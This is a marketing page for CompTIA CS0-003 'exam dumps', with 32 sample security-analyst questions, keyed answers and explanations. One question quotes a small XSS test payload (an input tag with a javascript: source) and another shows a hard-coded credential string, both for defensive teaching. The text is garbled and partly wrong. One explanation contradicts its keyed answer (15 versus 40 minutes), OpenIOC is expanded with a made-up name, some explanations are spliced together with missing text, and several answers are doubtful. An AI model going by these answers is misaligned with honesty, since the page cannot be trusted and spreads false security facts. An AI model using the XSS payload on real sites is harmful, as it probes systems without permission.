How to pass CompTIA CS0-003 exam with the help of dumps?
DumpsPool provides you the finest quality resources you’ve been looking for to no avail. So, it's due time you stop stressing and get ready for the exam. Our Online Test Engine provides you with the guidance you need to pass the certification exam. We guarantee top-grade results because we know we’ve covered each topic in a precise and understandable manner. Our expert team prepared the latest CompTIA CS0-003 Dumps to satisfy your need for training. Plus, they are in two different formats: Dumps PDF and Online Test Engine.
How Do I Know CompTIA CS0-003 Dumps are Worth it?
Did we mention our latest CS0-003 Dumps PDF is also available as Online Test Engine? And that’s just the point where things start to take root. Of all the amazing features you are offered here at DumpsPool, the money-back guarantee has to be the best one. Now that you know you don’t have to worry about the payments. Let us explore all other reasons you would want to buy from us. Other than affordable Real Exam Dumps, you are offered three-month free updates.
You can easily scroll through our large catalog of certification exams. And, pick any exam to start your training. That’s right, DumpsPool isn’t limited to just CompTIA Exams. We trust our customers need the support of an authentic and reliable resource. So, we made sure there is never any outdated content in our study resources. Our expert team makes sure everything is up to the mark by keeping an eye on every single update. Our main concern and focus are that you understand the real exam format. So, you can pass the exam in an easier way!
IT Students Are Using our CompTIA CyberSecurity Analyst CySA+ Certification Exam Dumps Worldwide!
It is a well-established fact that certification exams can’t be conquered without some help from experts. The point of using CompTIA CyberSecurity Analyst CySA+ Certification Exam Practice Question Answers is exactly that. You are constantly surrounded by IT experts who’ve been through you are about to and know better. The 24/7 customer service of DumpsPool ensures you are in touch with these experts whenever needed. Our 100% success rate and validity around the world, make us the most trusted resource candidates use. The updated Dumps PDF helps you pass the exam on the first attempt. And, with the money-back guarantee, you feel safe buying from us. You can claim your return on not passing the exam.
How to Get CS0-003 Real Exam Dumps?
Getting access to the real exam dumps is as easy as pressing a button, literally! There are various resources available online, but the majority of them sell scams or copied content. So, if you are going to attempt the CS0-003 exam, you need to be sure you are buying the right kind of Dumps. All the Dumps PDF available on DumpsPool are as unique and the latest as they can be. Plus, our Practice Question Answers are tested and approved by professionals. Making it the top authentic resource available on the internet. Our expert has made sure the Online Test Engine is free from outdated & fake content, repeated questions, and false plus indefinite information, etc. We make every penny count, and you leave our platform fully satisfied!
Implementing threat intelligence, conducting vulnerability scans, etc.
Software and Systems Security
18
Securing software development lifecycle, securing mobile devices, etc.
Security Operations and Monitoring
25
Implementing security frameworks, analyzing security incidents, etc.
Incident Response
22
Responding to cybersecurity incidents, investigating incidents, etc.
Compliance and Assessment
13
Conducting security assessments, implementing security controls, etc.
Frequently Asked Questions
CompTIA CS0-003 Sample Question Answers
Question # 1
An employee accessed a website that caused a device to become infected with invasivemalware. The incident response analyst has:• created the initial evidence log.• disabled the wireless adapter on the device.• interviewed the employee, who was unable to identify the website that was accessed• reviewed the web proxy traffic logs.Which of the following should the analyst do to remediate the infected device?
A. Update the system firmware and reimage the hardware. B. Install an additional malware scanner that will send email alerts to the analyst. C. Configure the system to use a proxy server for Internet access. D. Delete the user profile and restore data from backup.
Answer: A
Explanation: Updating the system firmware and reimaging the hardware is the best action
to perform to remediate the infected device, as it helps to ensure that the device is restored
to a clean and secure state and that any traces of malware are removed. Firmware is a
type of software that controls the low-level functions of a hardware device, such as a
motherboard, hard drive, or network card. Firmware can be updated or flashed to fix bugs,
improve performance, or enhance security. Reimaging is a process of erasing and
restoring the data on a storage device, such as a hard drive or a solid state drive, using an
image file that contains a copy of the operating system, applications, settings, and files.
Reimaging can help to recover from system failures, data corruption, or malware infections.
Updating the system firmware and reimaging the hardware can help to remediate the
infected device by removing any malicious code or configuration changes that may have
been made by the malware, as well as restoring any missing or damaged files or settings
that may have been affected by the malware. This can help to prevent further damage,
data loss, or compromise of the device or the network. The other actions are not as
effective or appropriate as updating the system firmware and reimaging the hardware, as
they do not address the root cause of the infection or ensure that the device is fully cleaned
and secured. Installing an additional malware scanner that will send email alerts to the
analyst may help to detect and remove some types of malware, but it may not be able to
catch all malware variants or remove them completely. It may also create conflicts or
performance issues with other security tools or systems on the device. Configuring the
system to use a proxy server for Internet access may help to filter or monitor some types of
malicious traffic or requests, but it may not prevent or remove malware that has already
infected the device or that uses other methods of communication or propagation. Deleting
the user profile and restoring data from backup may help to recover some data or settings
that may have been affected by the malware, but it may not remove malware that has
infected other parts of the system or that has persisted on the device.
Question # 2
A SOC analyst identifies the following content while examining the output of a debuggercommand over a client-server application:getconnection (database01, "alpha " , "AXTV. 127GdCx94GTd") ;Which of the following is the most likely vulnerability in this system?
A. Lack of input validation B. SQL injection C. Hard-coded credential D. Buffer overflow attacks
Answer: C
Explanation:
The most likely vulnerability in this system is hard-coded credential. Hard-coded credential
is a practice of embedding or storing a username, password, or other sensitive information
in the source code or configuration file of a system or application. Hard-coded credential
can pose a serious security risk, as it can expose the system or application to unauthorized
access, data theft, or compromise if the credential is discovered or leaked by an attacker.
Hard-coded credential can also make it difficult to change or update the credential if
needed, as it may require modifying the code or file and redeploying the system or
application.
Question # 3
A security analyst must preserve a system hard drive that was involved in a litigationrequest Which of the following is the best method to ensure the data on the device is notmodified?
A. Generate a hash value and make a backup image. B. Encrypt the device to ensure confidentiality of the data. C. Protect the device with a complex password. D. Perform a memory scan dump to collect residual data.
Answer: A
Explanation: Generating a hash value and making a backup image is the best method to
ensure the data on the device is not modified, as it creates a verifiable copy of the original
data that can be used for forensic analysis. Encrypting the device, protecting it with a
password, or performing a memory scan dump do not prevent the data from being altered
or deleted. Verified References: CompTIA CySA+ CS0-002 Certification Study Guide, page
3291
Question # 4
During an incident, some loCs of possible ransomware contamination were found in agroup of servers in a segment of the network. Which of the following steps should be takennext?
A. Isolation B. Remediation C. Reimaging D. Preservation
Answer: A
Explanation: Isolation is the first step to take after detecting some indicators of
compromise (IoCs) of possible ransomware contamination. Isolation prevents the
ransomware from spreading to other servers or segments of the network, and allows the
security team to investigate and contain the incident. Isolation can be done by
disconnecting the infected servers from the network, blocking the malicious traffic, or
applying firewall rules12. References: 10 Things You Should Do After a Ransomware Attack, How to Recover from a
Ransomware Attack: A Step-by-Step Guide
Question # 5
Which of the following would eliminate the need for different passwords for a variety orinternal application?
A. CASB B. SSO C. PAM D. MFA
Answer: B
Explanation: Single Sign-On (SSO) allows users to log in with a single ID and password to
access multiple applications. It eliminates the need for different passwords for various
internal applications, streamlining the authentication process.
Question # 6
An analyst wants to ensure that users only leverage web-based software that has beenpre-approved by the organization. Which of the following should be deployed?
A. Blocklisting B. Allowlisting C. Graylisting D. Webhooks
Answer: B
Explanation:
The correct answer is B. Allowlisting. Allowlisting is a technique that allows only pre-approved web-based software to run on a
system or network, while blocking all other software. Allowlisting can help prevent
unauthorized or malicious software from compromising the security of an organization.
Allowlisting can be implemented using various methods, such as application control,
browser extensions, firewall rules, or proxy servers12.
The other options are not the best techniques to ensure that users only leverage webbased
software that has been pre-approved by the organization. Blocklisting (A) is a
technique that blocks specific web-based software from running on a system or network,
while allowing all other software. Blocklisting can be ineffective or inefficient, as it requires
that temporarily rejects or delays incoming messages from unknown or suspicious sources,
until they are verified as legitimate. Graylisting is mainly used for email filtering, not for
web-based software control. Webhooks (D) are a technique that allows web-based
software to send or receive data from other web-based software in real time, based on
certain events or triggers. Webhooks are not related to web-based software control, but
rather to web-based software integration.
Question # 7
An email hosting provider added a new data center with new public IP addresses. Which ofthe following most likely needs to be updated to ensure emails from the new data center donot get blocked by spam filters?
A. DKIM B. SPF C. SMTP D. DMARC
Answer: B
Explanation: SPF (Sender Policy Framework) is a DNS TXT record that lists authorized
sending IP addresses for a given domain. If an email hosting provider added a new data
center with new public IP addresses, the SPF record needs to be updated to include those
new IP addresses, otherwise the emails from the new data center may fail SPF checks and get blocked by spam filters123 References: 1: Use DMARC to validate email, setup steps
2: How to set up SPF, DKIM and DMARC: other mail & hosting providers providers 3: Set
up SPF, DKIM, or DMARC records for my hosting email
Question # 8
A SOC analyst is analyzing traffic on a network and notices an unauthorized scan. Whichof the following types of activities is being observed?
A. Potential precursor to an attack B. Unauthorized peer-to-peer communication C. Rogue device on the network D. System updates
Answer: A
Question # 9
An organization's email account was compromised by a bad actor. Given the followingInformation:
Which of the following is the length of time the team took to detect the threat?
A. 25 minutes B. 40 minutes C. 45 minutes D. 2 hours
Answer: B
Explanation: The threat was detected from the time the emails were sent at 8:30 a.m. to
when the recipients started alerting the organization’s help desk about the email at 8:45
a.m., taking a total of 15 minutes. The detection time is the time elapsed between the
occurrence of an incident and its discovery by the security team . The other options are
either too short or too long based on the given information. References: : Detection Time :
Incident Response Metrics: Mean Time to Detect and Mean Time to Respond
Question # 10
An organization has activated the CSIRT. A security analyst believes a single virtual serverwas compromised and immediately isolated from the network. Which of the followingshould the CSIRT conduct next?
A. Take a snapshot of the compromised server and verify its integrity B. Restore the affected server to remove any malware C. Contact the appropriate government agency to investigate D. Research the malware strain to perform attribution
Answer: A
Explanation: The next action that the CSIRT should conduct after isolating the
compromised server from the network is to take a snapshot of the compromised server and
verify its integrity. Taking a snapshot of the compromised server involves creating an exact
copy or image of the server’s data and state at a specific point in time. Verifying its integrity involves ensuring that the snapshot has not been altered, corrupted, or tampered with
during or after its creation. Taking a snapshot and verifying its integrity can help preserve
and protect any evidence or information related to the incident, as well as prevent any
tampering, contamination, or destruction of evidence.
Question # 11
A security analyst has prepared a vulnerability scan that contains all of the company'sfunctional subnets. During the initial scan, users reported that network printers began toprint pages that contained unreadable text and icons.Which of the following should the analyst do to ensure this behavior does not oocur duringsubsequent vulnerability scans?
A. Perform non-credentialed scans. B. Ignore embedded web server ports. C. Create a tailored scan for the printer subnet. D. Increase the threshold length of the scan timeout.
Answer: C
Explanation: The best way to prevent network printers from printing pages during a
vulnerability scan is to create a tailored scan for the printer subnet that excludes the ports
and services that trigger the printing behavior. The other options are not effective for this
purpose: performing non-credentialed scans may not reduce the impact on the printers;
ignoring embedded web server ports may not cover all the possible ports that cause
printing; increasing the threshold length of the scan timeout may not prevent the printing
from occurring.
References: According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition1,
one of the objectives for the exam is to “use appropriate tools and methods to manage,
prioritize and respond to attacks and vulnerabilities”. The book also covers the usage and
syntax of vulnerability scanning tools, such as Nessus, Nmap, and Qualys, in chapter 4.
Specifically, it explains the meaning and function of each component in vulnerability
scanning, such as credentialed vs. non-credentialed scans, port scanning, and scan
scheduling1, pages 149-160. It also discusses the common issues and challenges of
vulnerability scanning, such as network disruptions, false positives, and scan scope1,
pages 161-162. Therefore, this is a reliable source to verify the answer to the question.
Question # 12
Which of the following makes STIX and OpenloC information readable by both humans andmachines?
A. XML B. URL C. OVAL D. TAXII
Answer: A
Explanation:
The correct answer is A. XML.
STIX and OpenloC are two standards for representing and exchanging cyber threat
intelligence (CTI) information. STIX stands for Structured Threat Information Expression
and OpenloC stands for Open Location and Identity Coordinates. Both standards use XML
as the underlying data format to encode the information in a structured and machinereadable
way. XML stands for Extensible Markup Language and it is a widely used
standard for defining and exchanging data on the web. XML uses tags, attributes, and
elements to describe the structure and meaning of the data. XML is also human-readable,
as it uses plain text and follows a hierarchical and nested structure.
XML is not the only format that can be used to make STIX and OpenloC information
readable by both humans and machines, but it is the most common and widely supported
one. Other formats that can be used include JSON, CSV, or PDF, depending on the use
case and the preferences of the information producers and consumers. However, XML has
some advantages over other formats, such as:
XML is more expressive and flexible than JSON or CSV, as it can define complex
data types, schemas, namespaces, and validation rules.
XML is more standardized and interoperable than PDF, as it can be easily parsed,
transformed, validated, and queried by various tools and languages.
XML is more compatible with existing CTI standards and tools than other formats,
as it is the basis for STIX 1.x, TAXII 1.x, MAEC, CybOX, OVAL, and others.
References:
1 Introduction to STIX - GitHub Pages
2 5 Best Threat Intelligence Feeds in 2023 (Free & Paid Tools) - Comparitech
3 What Are STIX/TAXII Standards? - Anomali Resources
4 What is STIX/TAXII? | Cloudflare
5 Sample Use | TAXII Project Documentation - GitHub Pages
6 Trying to retrieve xml data with taxii - Stack Overflow
7 CISA AIS TAXII Server Connection Guide
8 CISA AIS TAXII Server Connection Guide v2.0 | CISA
Question # 13
A security analyst found the following vulnerability on the company’s website:<INPUT TYPE=“IMAGE” SRC=“javascript:alert(‘test’);”>Which of the following should be implemented to prevent this type of attack in the future?
A. Input sanitization B. Output encoding C. Code obfuscation D. Prepared statements
Answer: A
Explanation:
This is a type of web application vulnerability called cross-site scripting (XSS), which allows an attacker to inject malicious code into a web page that is viewed by other users. XSS can
be used to steal cookies, session tokens, credentials, or other sensitive information, or to
perform actions on behalf of the victim.
Input sanitization is a technique that prevents XSS attacks by checking and filtering the
user input before processing it. Input sanitization can remove or encode any characters or
strings that may be interpreted as code by the browser, such as <, >, ", ', or javascript:.
Input sanitization can also validate the input against a predefined format or range of values,
and reject any input that does not match.
Output encoding is a technique that prevents XSS attacks by encoding the output before
sending it to the browser. Output encoding can convert any characters or strings that may
be interpreted as code by the browser into harmless entities, such as <, >, ", ', or
javascript:. Output encoding can also escape any special characters that may have a
different meaning in different contexts, such as , /, or ;.
Code obfuscation is a technique that makes the source code of a web application more
difficult to read and understand by humans. Code obfuscation can use techniques such as
renaming variables and functions, removing comments and whitespace, replacing literals
with expressions, or adding dummy code. Code obfuscation can help protect the
intellectual property and trade secrets of a web application, but it does not prevent XSS
attacks.
Question # 14
A systems administrator receives reports of an internet-accessible Linux server that isrunning very sluggishly. The administrator examines the server, sees a high amount ofmemory utilization, and suspects a DoS attack related to half-open TCP sessionsconsuming memory. Which of the following tools would best help to prove whether thisserver was experiencing this behavior?
A. Nmap B. TCPDump C. SIEM D. EDR
Answer: B
Explanation:
TCPDump is the best tool to prove whether the server was experiencing a DoS attack
related to half-open TCP sessions consuming memory. TCPDump is a command-line tool
that can capture and analyze network traffic, such as TCP, UDP, and ICMP packets.
TCPDump can help the administrator to identify the source and destination of the traffic,
the TCP flags and sequence numbers, the packet size and frequency, and other
information that can indicate a DoS attack. A DoS attack related to half-open TCP sessions
is also known as a SYN flood attack, which is a type of volumetric attack that aims to
exhaust the network bandwidth or resources of the target server by sending a large amount
of TCP SYN requests and ignoring the TCP SYN-ACK responses. This creates a backlog
of half-open connections on the server, which consume memory and CPU resources, and
prevent legitimate connections from being established12. TCPDump can help the
administrator to detect a SYN flood attack by looking for a high number of TCP SYN
packets with different source IP addresses, a low number of TCP SYN-ACK packets, and a
very low number of TCP ACK packets34. References: SYN flood DDoS attack | Cloudflare,
What is a SYN flood attack and how to prevent it? | NETSCOUT, TCPDump - A Powerful
Tool for Network Analysis and Security, How to Detect a SYN Flood Attack with TCPDump
Question # 15
Which of the following is the best action to take after the conclusion of a security incident toimprove incident response in the future?
A. Develop a call tree to inform impacted users B. Schedule a review with all teams to discuss what occurred C. Create an executive summary to update company leadership D. Review regulatory compliance with public relations for official notification
Answer: B
Explanation: One of the best actions to take after the conclusion of a security incident to
improve incident response in the future is to schedule a review with all teams to discuss
what occurred, what went well, what went wrong, and what can be improved. This review is
also known as a lessons learned session or an after-action report. The purpose of this
review is to identify the root causes of the incident, evaluate the effectiveness of the
incident response process, document any gaps or weaknesses in the security controls, and
recommend corrective actions or preventive measures for future incidents. Official
Which of the following should be updated after a lessons-learned review?
A. Disaster recovery plan B. Business continuity plan C. Tabletop exercise D. Incident response plan
Answer: D
Explanation: A lessons-learned review is a process of evaluating the effectiveness and
efficiency of the incident response plan after an incident or an exercise. The purpose of the
review is to identify the strengths and weaknesses of the incident response plan, and to
update it accordingly to improve the future performance and resilience of the organization.
Therefore, the incident response plan should be updated after a lessons-learned review.
References: The answer was based on the NCSC CAF guidance from the National Cyber
Security Centre, which states: “You should use post-incident and post-exercise reviews to
actively reduce the risks associated with the same, or similar, incidents happening in future.
Lessons learned can inform any aspect of your cyber security, including: System
configuration Security monitoring and reporting Investigation procedures
Containment/recovery strategies”
Question # 17
A malicious actor has gained access to an internal network by means of social engineering.The actor does not want to lose access in order to continue the attack. Which of thefollowing best describes the current stage of the Cyber Kill Chain that the threat actor iscurrently operating in?
A. Weaponization B. Reconnaissance C. Delivery D. Exploitation
Answer: D
Explanation: The Cyber Kill Chain is a framework that describes the stages of a
cyberattack from reconnaissance to actions on objectives. The exploitation stage is where attackers take advantage of the vulnerabilities they have discovered in previous stages to
further infiltrate a target’s network and achieve their objectives. In this case, the malicious
actor has gained access to an internal network by means of social engineering and does
not want to lose access in order to continue the attack. This indicates that the actor is in the
exploitation stage of the Cyber Kill Chain. Official References:
Which of the following best describes the process of requiring remediation of a knownthreat within a given time frame?
A. SLA B. MOU C. Best-effort patching D. Organizational governance
Answer: A
Explanation: An SLA (Service Level Agreement) is a contract or agreement between a
service provider and a customer that defines the expected level of service, performance,
quality, and availability of the service. An SLA also specifies the responsibilities,
obligations, and penalties for both parties in case of non-compliance or breach of the
agreement. An SLA can help organizations to ensure that their security services are
delivered in a timely and effective manner, and that any security incidents or vulnerabilities
are addressed and resolved within a specified time frame. An SLA can also help to
establish clear communication, expectations, and accountability between the service
provider and the customer12
An MOU (Memorandum of Understanding) is a document that expresses a mutual
agreement or understanding between two or more parties on a common goal or objective.
An MOU is not legally binding, but it can serve as a basis for future cooperation or collaboration. An MOU may not be suitable for requiring remediation of a known threat
within a given time frame, as it does not have the same level of enforceability, specificity, or
measurability as an SLA.
Best-effort patching is an informal and ad hoc approach to applying security patches or
updates to systems or software. Best-effort patching does not follow any defined process,
policy, or schedule, and relies on the availability and discretion of the system administrators
or users. Best-effort patching may not be effective or efficient for requiring remediation of a
known threat within a given time frame, as it does not guarantee that the patches are
applied correctly, consistently, or promptly. Best-effort patching may also introduce new
risks or vulnerabilities due to human error, compatibility issues, or lack of testing.
Organizational governance is the framework of rules, policies, procedures, and processes
that guide and direct the activities and decisions of an organization. Organizational
governance can help to establish the roles, responsibilities, and accountabilities of different
stakeholders within the organization, as well as the goals, values, and principles that shape
the organizational culture and behavior. Organizational governance can also help to ensure
compliance with internal and external standards, regulations, and laws. Organizational
governance may not be sufficient for requiring remediation of a known threat within a given
time frame, as it does not specify the details or metrics of the service delivery or
performance. Organizational governance may also vary depending on the size, structure,
and nature of the organization.
Question # 19
Which of the following can be used to learn more about TTPs used by cybercriminals?
A. ZenMAP B. MITRE ATT&CK C. National Institute of Standards and Technology D. theHarvester
Answer: B
Explanation: MITRE ATT&CK is a globally accessible knowledge base of adversary
tactics and techniques based on real-world observations. It is used as a foundation for the
development of specific threat models and methodologies in the private sector, in
government, and in the cybersecurity product and service community. It can help security
professionals understand, detect, and mitigate cyber threats by providing a comprehensive
framework of TTPs.
References: MITRE ATT&CK, Getting Started with ATT&CK, MITRE ATT&CK | MITRE
Question # 20
A security manager is looking at a third-party vulnerability metric (SMITTEN) to improve upon the company's current method that relies on CVSSv3. Given the following:
Which of the following vulnerabilities should be prioritized?
A. Vulnerability 1 B. Vulnerability 2 C. Vulnerability 3 D. Vulnerability 4
Answer: B
Explanation: Vulnerability 2 should be prioritized as it is exploitable, has high exploit
activity, and is exposed externally according to the SMITTEN metric. References:
Vulnerability Management Metrics: 5 Metrics to Start Measuring in Your Program,
Section: Vulnerability Severity.
Question # 21
An analyst is evaluating a vulnerability management dashboard. The analyst sees that apreviously remediated vulnerability has reappeared on a database server. Which of thefollowing is the most likely cause?
A. The finding is a false positive and should be ignored. B. A rollback had been executed on the instance. C. The vulnerability scanner was configured without credentials. D. The vulnerability management software needs to be updated.
Answer: B
Explanation:
A rollback had been executed on the instance. If a database server is restored to a
previous state, it may reintroduce a vulnerability that was previously fixed. This can happen
due to backup and recovery operations, configuration changes, or software updates. A
rollback can undo the patching or mitigation actions that were applied to remediate the
vulnerability. References: Vulnerability Remediation: It’s Not Just Patching, Section: The
Remediation Process; Vulnerability assessment for SQL Server, Section: Remediation
Question # 22
A security program was able to achieve a 30% improvement in MTTR by integratingsecurity controls into a SIEM. The analyst no longer had to jump between tools. Which ofthe following best describes what the security program did?
A. Data enrichment B. Security control plane C. Threat feed combination D. Single pane of glass
Answer: D
Explanation: A single pane of glass is a term that describes a unified view or interface that
integrates multiple tools or data sources into one dashboard or console. A single pane of
glass can help improve security operations by providing visibility, correlation, analysis, and
alerting capabilities across various security controls and systems. A single pane of glass
can also help reduce complexity, improve efficiency, and enhance decision making for
security analysts. In this case, a security program was able to achieve a 30% improvement
in MTTR by integrating security controls into a SIEM, which provides a single pane of glass
An incident response team found IoCs in a critical server. The team needs to isolate andcollect technical evidence for further investigation. Which of the following pieces of datashould be collected first in order to preserve sensitive information before isolating theserver?
A. Hard disk B. Primary boot partition C. Malicious tiles D. Routing table E. Static IP address
Answer: A
Explanation: The hard disk is the piece of data that should be collected first in order to
preserve sensitive information before isolating the server. The hard disk contains all the
files and data stored on the server, which may include evidence of malicious activity, such
as malware installation, data exfiltration, or configuration changes. The hard disk should be
collected using proper forensic techniques, such as creating an image or a copy of the disk
and maintaining its integrity using hashing algorithms.
Question # 24
A company has a primary control in place to restrict access to a sensitive database.However, the company discovered an authentication vulnerability that could bypass thiscontrol. Which of the following is the best compensating control?
A. Running regular penetration tests to identify and address new vulnerabilities B. Conducting regular security awareness training of employees to prevent socialengineering attacks C. Deploying an additional layer of access controls to verify authorized individuals D. Implementing intrusion detection software to alert security teams of unauthorized accessattempts
Answer: C
Explanation:
Deploying an additional layer of access controls to verify authorized individuals is the best
compensating control for the authentication vulnerability that could bypass the primary
control. A compensating control is a security measure that is implemented to mitigate the
risk of a vulnerability or a threat when the primary control is not sufficient or feasible. A
compensating control should provide a similar or greater level of protection as the primary
control, and should be closely related to the vulnerability or the threat it is addressing1. In
this case, the primary control is to restrict access to a sensitive database, and the
vulnerability is an authentication bypass. Therefore, the best compensating control is to
deploy an additional layer of access controls, such as multifactor authentication, role-based
access control, or encryption, to verify the identity and the authorization of the individuals
who are accessing the database. This way, the compensating control can prevent
unauthorized access to the database, even if the primary control is bypassed23. Running
regular penetration tests, conducting regular security awareness training, and implementing intrusion detection software are all good security practices, but they are not compensating
controls for the authentication vulnerability, as they do not provide a similar or greater level
of protection as the primary control, and they are not closely related to the vulnerability or
the threat they are addressing. References: Compensating Controls: An Impermanent
Solution to an IT … - Tripwire, What is Multifactor Authentication (MFA)? | Duo Security,
Role-Based Access Control (RBAC) and Role-Based Security, [What is a Penetration Test
and How Does It Work?]
Question # 25
A Chief Information Security Officer has outlined several requirements for a newvulnerability scanning project:. Must use minimal network bandwidth. Must use minimal host resources. Must provide accurate, near real-time updates. Must not have any stored credentials in configuration on the scannerWhich of the following vulnerability scanning methods should be used to best meet theserequirements?
A. Internal B. Agent C. Active D. Uncredentialed
Answer: B
Explanation: Agent-based vulnerability scanning is a method that uses software agents
installed on the target systems to scan for vulnerabilities. This method meets the
requirements of the project because it uses minimal network bandwidth and host
resources, provides accurate and near real-time updates, and does not require any stored
credentials on the scanner. References: What Is Vulnerability Scanning? Types, Tools and
Best Practices, Section: Types of vulnerability scanning; CompTIA CySA+ Study Guide:
A security alert was triggered when an end user tried to access a website that is notallowed per organizational policy. Since the action is considered a terminable offense, theSOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to build the case for the investigation. Which ofthe following is the best way to ensure that the investigation complies with HR or privacypolicies?
A. Create a timeline of events detailinq the date stamps, user account hostname and IPinformation associated with the activities B. Ensure that the case details do not reflect any user-identifiable information Passwordprotect the evidence and restrict access to personnel related to the investigation C. Create a code name for the investigation in the ticketing system so that all personnelwith access will not be able to easily identity the case as an HR-related investigation D. Notify the SOC manager for awareness after confirmation that the activity wasintentional
Answer: B
Explanation: The best way to ensure that the investigation complies with HR or privacy
policies is to ensure that the case details do not reflect any user-identifiable information,
such as name, email address, phone number, or employee ID. This can help protect the
privacy and confidentiality of the user and prevent any potential discrimination or retaliation.
Additionally, password protecting the evidence and restricting access to personnel related
to the investigation can help preserve the integrity and security of the evidence and prevent
any unauthorized or accidental disclosure or modification.
Question # 27
A cybersecurity analyst is recording the following details* ID* Name* Description* Classification of information* Responsible partyIn which of the following documents is the analyst recording this information?
A. Risk register B. Change control documentation C. Incident response playbook D. Incident response plan
Answer: A
Explanation: A risk register typically contains details like ID, name, description,
classification of information, and responsible party. It’s used for tracking identified risks and
managing them.Recording details like ID, Name, Description, Classification of information,
and Responsible party is typically done in a Risk Register. This document is used to
identify, assess, manage, and monitor risks within an organization. It's not directly related
to incident response or change control documentation.
Question # 28
The Chief Information Security Officer is directing a new program to reduce attack surfacerisks and threats as part of a zero trust approach. The IT security team is required to comeup with priorities for the program. Which of the following is the best priority based oncommon attack frameworks?
A. Reduce the administrator and privileged access accounts B. Employ a network-based IDS C. Conduct thorough incident response D. Enable SSO to enterprise applications
Answer: A
Explanation: The best priority based on common attack frameworks for a new program to
reduce attack surface risks and threats as part of a zero trust approach is to reduce the
administrator and privileged access accounts. Administrator and privileged access
accounts are accounts that have elevated permissions or capabilities to perform sensitive or critical tasks on systems or networks, such as installing software, changing
configurations, accessing data, or granting access. Reducing the administrator and
privileged access accounts can help minimize the attack surface, as it can limit the number
of potential targets or entry points for attackers, as well as reduce the impact or damage of
an attack if an account is compromised.
Question # 29
Which of the following threat-modeling procedures is in the OWASP Web Security TestingGuide?
A. Review Of security requirements B. Compliance checks C. Decomposing the application D. Security by design
Answer: C
Explanation:
The OWASP Web Security Testing Guide (WSTG) includes a section on threat modeling,
which is a structured approach to identify, quantify, and address the security risks
associated with an application. The first step in the threat modeling process is
decomposing the application, which involves creating use cases, identifying entry points,
assets, trust levels, and data flow diagrams for the application. This helps to understand
the application and how it interacts with external entities, as well as to identify potential
threats and vulnerabilities1. The other options are not part of the OWASP WSTG threat
modeling process.
Question # 30
During an incident, a security analyst discovers a large amount of Pll has been emailedexternally from an employee to a public email address. The analyst finds that the externalemail is the employee'spersonal email. Which of the following should the analyst recommend be done first?
A. Place a legal hold on the employee's mailbox. B. Enable filtering on the web proxy. C. Disable the public email access with CASB. D. Configure a deny rule on the firewall.
Answer: A
Explanation: Placing a legal hold on the employee’s mailbox is the best action to perform
first, as it preserves all mailbox content, including deleted items and original versions of
modified items, for potential legal or forensic purposes. A legal hold is a feature that allows
an administrator to retain mailbox data for a user indefinitely or for a specified period,
regardless of the user’s actions or retention policies. A legal hold can be applied to a
mailbox using Litigation Hold or In-Place Hold in Exchange Server or Exchange Online. A
legal hold can help to ensure that evidence of data exfiltration or other malicious activities
is not lost or tampered with, and that the organization can comply with any legal or
regulatory obligations. The other actions are not as urgent or effective as placing a legal
hold on the employee’s mailbox, as they do not address the immediate threat of data loss
or compromise. Enabling filtering on the web proxy may help to prevent some types of data
exfiltration or malicious traffic, but it does not help to recover or preserve the data that has
already been emailed externally. Disabling the public email access with CASB (Cloud
Access Security Broker) may help to block or monitor the use of public email services by
employees, but it does not help to recover or preserve the data that has already been
emailed externally. Configuring a deny rule on the firewall may help to block or monitor the
network traffic from the employee’s laptop, but it does not help to recover or preserve the
data that has already been emailed externally.
Question # 31
A systems administrator notices unfamiliar directory names on a production server. Theadministrator reviews the directory listings and files, and then concludes the server hasbeencompromised. Which of the following steps should the administrator take next?
A. Inform the internal incident response team. B. Follow the company's incident response plan. C. Review the lessons learned for the best approach. D. Determine when the access started.
Answer: B
Explanation: An incident response plan is a set of predefined procedures and guidelines
that an organization follows when faced with a security breach or attack. An incident
response plan helps to ensure that the organization can quickly and effectively contain,
analyze, eradicate, and recover from the incident, as well as prevent or minimize the
damage and impact to the business operations, reputation, and customers. An incident
response plan also defines the roles and responsibilities of the incident response team, the
communication channels and protocols, the escalation and reporting procedures, and the
tools and resources available for the incident response.
By following the company’s incident response plan, the administrator can ensure that they
are following the best practices and standards for handling a security incident, and that
they are coordinating and collaborating with the relevant stakeholders and authorities.
Following the company’s incident response plan can also help to avoid or reduce any legal,
regulatory, or contractual liabilities or penalties that may arise from the incident.
The other options are not as effective or appropriate as following the company’s incident
response plan. Informing the internal incident response team (A) is a good step, but it
should be done according to the company’s incident response plan, which may specify
who, when, how, and what to report. Reviewing the lessons learned for the best approach
during the active response phase. Determining when the access started (D) is a good step,
but it should be done as part of the analysis phase of the incident response plan, not before
following the plan.
Question # 32
After a security assessment was done by a third-party consulting firm, the cybersecurityprogram recommended integrating DLP and CASB to reduce analyst alert fatigue. Which ofthe following is the best possible outcome that this effort hopes to achieve?
A. SIEM ingestion logs are reduced by 20%. B. Phishing alerts drop by 20%. C. False positive rates drop to 20%. D. The MTTR decreases by 20%.
Answer: D
Explanation:
The MTTR (Mean Time to Resolution) decreases by 20% is the best possible outcome that
this effort hopes to achieve, as it reflects the improvement in the efficiency and
effectiveness of the incident response process by reducing analyst alert fatigue. Analyst
alert fatigue is a term that refers to the phenomenon of security analysts becoming
overwhelmed, desensitized, or exhausted by the large number of alerts they receive from
various security tools or systems, such as DLP (Data Loss Prevention) or CASB (Cloud
Access Security Broker). DLP is a security solution that helps to prevent unauthorized access, use, or transfer of sensitive data, such as personal information, intellectual
property, or financial records. CASB is a security solution that helps to monitor and control
the use of cloud-based applications and services, such as SaaS (Software as a Service),
PaaS (Platform as a Service), or IaaS (Infrastructure as a Service). Both DLP and CASB
can generate alerts when they detect potential data breaches, policy violations, or
malicious activities, but they can also produce false positives, irrelevant information, or
duplicate notifications that can overwhelm or distract the security analysts. Analyst alert
fatigue can have negative consequences for the security posture and performance of an
organization, such as missing or ignoring critical alerts, delaying or skipping investigations
or remediations, making errors or mistakes, or losing motivation or morale. Therefore, it is
important to reduce analyst alert fatigue and optimize the alert management process by
using various strategies, such as tuning the alert thresholds and rules, prioritizing and
triaging the alerts based on severity and context, enriching and correlating the alerts with
additional data sources, automating or orchestrating repetitive or low-level tasks or actions,
or integrating and consolidating different security tools or systems into a unified platform.
By reducing analyst alert fatigue and optimizing the alert management process, the effort
hopes to achieve a decrease in the MTTR, which is a metric that measures the average
time it takes to resolve an incident from the moment it is reported to the moment it is
closed. A lower MTTR indicates a faster and more effective incident response process,
which can help to minimize the impact and damage of security incidents, improve customer
